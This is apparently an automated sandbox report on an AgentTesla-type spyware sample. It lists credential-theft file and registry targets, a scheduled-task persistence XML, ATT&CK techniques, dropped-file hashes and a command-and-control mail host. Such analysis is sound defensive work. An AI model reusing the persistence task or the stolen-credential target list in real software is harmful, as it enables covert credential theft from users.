Source: Yara match | File source: 14.2.bgURAojpNNIb.exe.3b9bf28.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.DOCUMENTS.exe.4a7f3c8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000D.00000002.1395584296.00000000030A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.2533846228.0000000002B1E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.1395584296.00000000030A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.1393894903.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.2533846228.0000000002B26000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.1418243148.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.2533846228.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1359470128.0000000004A7F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.1395584296.0000000003051000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: DOCUMENTS.exe PID: 7304, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 8044, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: bgURAojpNNIb.exe PID: 8136, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 736, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match | File source: 1.2.DOCUMENTS.exe.4ab9de8.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.bgURAojpNNIb.exe.3bd6948.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.DOCUMENTS.exe.4a7f3c8.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.bgURAojpNNIb.exe.3b9bf28.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.bgURAojpNNIb.exe.3bd6948.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.DOCUMENTS.exe.4ab9de8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.bgURAojpNNIb.exe.3b9bf28.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.DOCUMENTS.exe.4a7f3c8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000D.00000002.1393894903.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.1418243148.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.2533846228.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1359470128.0000000004A7F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.1395584296.0000000003051000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: DOCUMENTS.exe PID: 7304, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 8044, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: bgURAojpNNIb.exe PID: 8136, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 736, type: MEMORYSTR

                      Remote Access Functionality

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 1.2.DOCUMENTS.exe.4ab9de8.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.bgURAojpNNIb.exe.3bd6948.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.DOCUMENTS.exe.4a7f3c8.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.bgURAojpNNIb.exe.3b9bf28.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.bgURAojpNNIb.exe.3bd6948.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.DOCUMENTS.exe.4ab9de8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.bgURAojpNNIb.exe.3b9bf28.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.DOCUMENTS.exe.4a7f3c8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000D.00000002.1395584296.00000000030A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.2533846228.0000000002B1E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.1395584296.00000000030A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.1393894903.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.2533846228.0000000002B26000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.1418243148.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.2533846228.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1359470128.0000000004A7F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.1395584296.0000000003051000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: DOCUMENTS.exe PID: 7304, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 8044, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: bgURAojpNNIb.exe PID: 8136, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 736, type: MEMORYSTR
MITRE ATT&CK Matrix

Techniques are listed per tactic column of the report's matrix; where the matrix cell carries a number, it is kept in front of the technique name as displayed.

Reconnaissance: Gather Victim Identity Information | Credentials | Email Addresses | Employee Names | Gather Victim Network Information | Domain Properties | DNS | Network Trust Dependencies
Resource Development: Acquire Infrastructure | Domains | DNS Server | Virtual Private Server | Server | Botnet | Web Services | Serverless
Initial Access: Valid Accounts | Default Accounts | Domain Accounts | Local Accounts | Cloud Accounts | Replication Through Removable Media | External Remote Services | Drive-by Compromise
Execution: 121 Windows Management Instrumentation | 1 Scheduled Task/Job | At | Cron | Launchd | Scheduled Task | Systemd Timers | Container Orchestration Job
Persistence: 1 DLL Side-Loading | 1 Scheduled Task/Job | Logon Script (Windows) | Login Hook | Network Logon Script | RC Scripts | Startup Items | Scheduled Task/Job
Privilege Escalation: 1 DLL Side-Loading | 311 Process Injection | 1 Scheduled Task/Job | Login Hook | Network Logon Script | RC Scripts | Startup Items | Scheduled Task/Job
Defense Evasion: 11 Disable or Modify Tools | 1 Deobfuscate/Decode Files or Information | 3 Obfuscated Files or Information | 12 Software Packing | 1 DLL Side-Loading | 1 Masquerading | 141 Virtualization/Sandbox Evasion | 311 Process Injection
Credential Access: 1 OS Credential Dumping | 1 Input Capture | 1 Credentials in Registry | NTDS | LSA Secrets | Cached Domain Credentials | DCSync | Proc Filesystem
Discovery: 2 File and Directory Discovery | 24 System Information Discovery | 221 Security Software Discovery | 1 Process Discovery | 141 Virtualization/Sandbox Evasion | 1 Application Window Discovery | Remote System Discovery | System Owner/User Discovery
Lateral Movement: Remote Services | Remote Desktop Protocol | SMB/Windows Admin Shares | Distributed Component Object Model | SSH | VNC | Windows Remote Management | Cloud Services
Collection: 11 Archive Collected Data | 1 Data from Local System | 1 Email Collection | 1 Input Capture | Keylogging | GUI Input Capture | Web Portal Capture | Credential API Hooking
Command and Control: 1 Encrypted Channel | 1 Non-Standard Port | 1 Non-Application Layer Protocol | 11 Application Layer Protocol | Fallback Channels | Multiband Communication | Commonly Used Port | Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth | Automated Exfiltration | Traffic Duplication | Scheduled Transfer | Data Transfer Size Limits | Exfiltration Over C2 Channel | Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features | Network Denial of Service | Data Encrypted for Impact | Data Destruction | Data Encrypted for Impact | Service Stop | Inhibit System Recovery | Defacement
Behavior Graph

Behavior Graph ID: 1427366 | Sample: DOCUMENTS.exe | Start date: 17/04/2024 | Architecture: WINDOWS | Score: 100

Start (node 2)
  DNS/IP: mail.thelamalab.com
  Signatures: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 10 other signatures
  Started: DOCUMENTS.exe 7 (node 8); bgURAojpNNIb.exe 5 (node 12)
DOCUMENTS.exe (node 8)
  Dropped: C:\Users\user\AppData\...\bgURAojpNNIb.exe, PE32; C:\Users\user\AppData\Local\...\tmp1DED.tmp, XML
  Signatures: Uses schtasks.exe or at.exe to add and modify task schedules; Writes to foreign memory regions; Allocates memory in foreign processes; 2 other signatures
  Started: RegSvcs.exe 2 (node 14); powershell.exe 23 (node 18); powershell.exe 23 (node 20); 2 other processes (node 26)
bgURAojpNNIb.exe (node 12)
  Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
  Started: RegSvcs.exe (node 22); schtasks.exe (node 24)
RegSvcs.exe (node 14)
  DNS/IP: mail.thelamalab.com 162.222.226.100, 49708, 49710, 587, PUBLIC-DOMAIN-REGISTRYUS United States
powershell.exe (node 18)
  Signatures: Loading BitLocker PowerShell Module
  Started: conhost.exe (node 28); WmiPrvSE.exe (node 30)
powershell.exe (node 20)
  Started: conhost.exe (node 32)
RegSvcs.exe (node 22)
  Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)
schtasks.exe (node 24)
  Started: conhost.exe (node 34)
2 other processes (node 26)
  Signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
  Started: conhost.exe (node 36)

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample
Source | Detection | Scanner | Label
DOCUMENTS.exe | 45% | ReversingLabs | Win32.Spyware.Negasteal
DOCUMENTS.exe | 36% | Virustotal |
DOCUMENTS.exe | 100% | Avira | HEUR/AGEN.1309705
DOCUMENTS.exe | 100% | Joe Sandbox ML |

Dropped Files
Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | 100% | Avira | HEUR/AGEN.1309705
C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | 45% | ReversingLabs | Win32.Spyware.Negasteal
C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | 36% | Virustotal |

Unpacked PE Files
No Antivirus matches

Domains
Source | Detection | Scanner | Label
mail.thelamalab.com | 0% | Virustotal |

URLs
Source | Detection | Scanner | Label
http://mail.thelamalab.com | 0% | Virustotal |
Domains and IPs

Contacted Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
mail.thelamalab.com | 162.222.226.100 | true | true | | unknown

URLs from Memory and Binaries
Name | Source | Malicious | Antivirus Detection | Reputation
http://mail.thelamalab.com | RegSvcs.exe, 0000000D.00000002.1395584296.00000000030A8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000012.00000002.2533846228.0000000002B26000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://account.dyn.com/ | DOCUMENTS.exe, 00000001.00000002.1359470128.0000000004A7F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1393894903.0000000000402000.00000040.00000400.00020000.00000000.sdmp, bgURAojpNNIb.exe, 0000000E.00000002.1418243148.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | DOCUMENTS.exe, 00000001.00000002.1357702369.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, bgURAojpNNIb.exe, 0000000E.00000002.1415939466.0000000002B78000.00000004.00000800.00020000.00000000.sdmp | false | | high
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
162.222.226.100 | mail.thelamalab.com | United States | 394695 | PUBLIC-DOMAIN-REGISTRYUS | true
General Information

Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1427366
Start date and time: 2024-04-17 15:07:15 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 34s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes: 23
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: DOCUMENTS.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@21/15@1/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 183
• Number of non-executed functions: 20
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
15:08:12 | API Interceptor | 1x Sleep call for process: DOCUMENTS.exe modified
15:08:16 | API Interceptor | 34x Sleep call for process: powershell.exe modified
15:08:17 | Task Scheduler | Run new task: bgURAojpNNIb path: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe
15:08:17 | API Interceptor | 37x Sleep call for process: RegSvcs.exe modified
15:08:19 | API Interceptor | 1x Sleep call for process: bgURAojpNNIb.exe modified
Joe Sandbox View / Context

IPs
Match: 162.222.226.100
Associated Sample Name / URL | Detection | Threat Name | Context
SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | malicious | AgentTesla |
SHIPPING ORDER.exe | malicious | AgentTesla |
receipt-73633T36X90N.exe | malicious | AgentTesla |
AQQ-T7630-CVE8.exe | malicious | AgentTesla |
SecuriteInfo.com.Win32.CrypterX-gen.1573.32091.exe | malicious | AgentTesla |
SCAN_INCORRECT_DETAILS.exe | malicious | AgentTesla |
SecuriteInfo.com.Heur.26171.30744.exe | malicious | AgentTesla |
INVOICE_FEB-888201-2024.exe | malicious | AgentTesla |
INVOICE_FEB-888201-2024.exe | malicious | AgentTesla |
PURCHASE ORDER.exe | malicious | AgentTesla |

Domains
Match: mail.thelamalab.com
Associated Sample Name / URL | Detection | Threat Name | Context
SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | malicious | AgentTesla | 162.222.226.100
SHIPPING ORDER.exe | malicious | AgentTesla | 162.222.226.100
receipt-73633T36X90N.exe | malicious | AgentTesla | 162.222.226.100
AQQ-T7630-CVE8.exe | malicious | AgentTesla | 162.222.226.100
SecuriteInfo.com.Win32.CrypterX-gen.1573.32091.exe | malicious | AgentTesla | 162.222.226.100
SCAN_INCORRECT_DETAILS.exe | malicious | AgentTesla | 162.222.226.100
SecuriteInfo.com.Heur.26171.30744.exe | malicious | AgentTesla | 162.222.226.100
INVOICE_FEB-888201-2024.exe | malicious | AgentTesla | 162.222.226.100
INVOICE_FEB-888201-2024.exe | malicious | AgentTesla | 162.222.226.100
PURCHASE ORDER.exe | malicious | AgentTesla | 162.222.226.100

ASNs
Match: PUBLIC-DOMAIN-REGISTRYUS
Associated Sample Name / URL | Detection | Threat Name | Context
Cleared Payment.exe | malicious | AgentTesla | 208.91.199.223
Quote.exe | malicious | AgentTesla | 208.91.199.225
Quotation 0048484.exe | malicious | AgentTesla | 208.91.199.225
SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | malicious | AgentTesla | 162.222.226.100
Fsd5TmAZfy.exe | malicious | AgentTesla | 208.91.198.143
SHIPPING ORDER.exe | malicious | AgentTesla | 162.222.226.100
MV SUN OCEAN BUNKER INV.doc | malicious | AgentTesla | 208.91.199.224
ReInquiry Lenght Error.exe | malicious | AgentTesla | 208.91.199.223
ES502900012.pdf.exe | malicious | AgentTesla | 208.91.199.224
April 2024 order Pdf.exe | malicious | AgentTesla | 208.91.198.143
                                              No context
                                              No context
Created / Dropped Files

Process: C:\Users\user\Desktop\DOCUMENTS.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

Process: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):2232
                                              Entropy (8bit):5.379460230152629
                                              Encrypted:false
                                              SSDEEP:48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:fLHyIFKL3IZ2KRH9Oug8s
                                              MD5:4DC84D28CF28EAE82806A5390E5721C8
                                              SHA1:66B6385EB104A782AD3737F2C302DEC0231ADEA2
                                              SHA-256:1B89BFB0F44C267035B5BC9B2A8692FF29440C0FEE71C636B377751DAF6911C0
                                              SHA-512:E8F45669D27975B41401419B8438E8F6219AF4D864C46B8E19DC5ECD50BD6CA589BDEEE600A73DDB27F8A8B4FF7318000641B6A59E0A5CDD7BE0C82D969A68DE
                                              Malicious:false
                                              Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Users\user\Desktop\DOCUMENTS.exe
                                              File Type:XML 1.0 document, ASCII text
                                              Category:dropped
                                              Size (bytes):1571
                                              Entropy (8bit):5.114289836870766
                                              Encrypted:false
                                              SSDEEP:48:cge7XQBBYrFdOFzOzN33ODOiDdKrsuTSv:He7XQBBYrFdOFzOz6dKrsuk
                                              MD5:D7836C3180BA5084ED5B66D06F809BD7
                                              SHA1:411AFEDF7A4D0FF932C29A5D1EB93336FA367FBC
                                              SHA-256:B0326B08B7C2C26C4F1A2803F9FE4EC6A1BEE592B9D0336C82332122BF59C282
                                              SHA-512:35E69C13F2C077FB2FD87B868DC7252AC031DF7E46E25C95DB7D3A91E69E6033933747892FB81C02E62AC96176FB492D003F6BF9289CDD9C3D819613C36F06B8
                                              Malicious:true
                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f
                                              Process:C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe
                                              File Type:XML 1.0 document, ASCII text
                                              Category:dropped
                                              Size (bytes):1571
                                              Entropy (8bit):5.114289836870766
                                              Encrypted:false
                                              SSDEEP:48:cge7XQBBYrFdOFzOzN33ODOiDdKrsuTSv:He7XQBBYrFdOFzOz6dKrsuk
                                              MD5:D7836C3180BA5084ED5B66D06F809BD7
                                              SHA1:411AFEDF7A4D0FF932C29A5D1EB93336FA367FBC
                                              SHA-256:B0326B08B7C2C26C4F1A2803F9FE4EC6A1BEE592B9D0336C82332122BF59C282
                                              SHA-512:35E69C13F2C077FB2FD87B868DC7252AC031DF7E46E25C95DB7D3A91E69E6033933747892FB81C02E62AC96176FB492D003F6BF9289CDD9C3D819613C36F06B8
                                              Malicious:false
                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f
                                              Process:C:\Users\user\Desktop\DOCUMENTS.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):740864
                                              Entropy (8bit):7.924525528723306
                                              Encrypted:false
                                              SSDEEP:12288:NGL21IL4BoL2cWjoIRWXcM6CtXx+KWjd1rYQILW4760PVQBmA8URQbXj3kZ3JPAN:sL21ILeoLrARfCJ3WJ1rYHW47ZVQ38XT
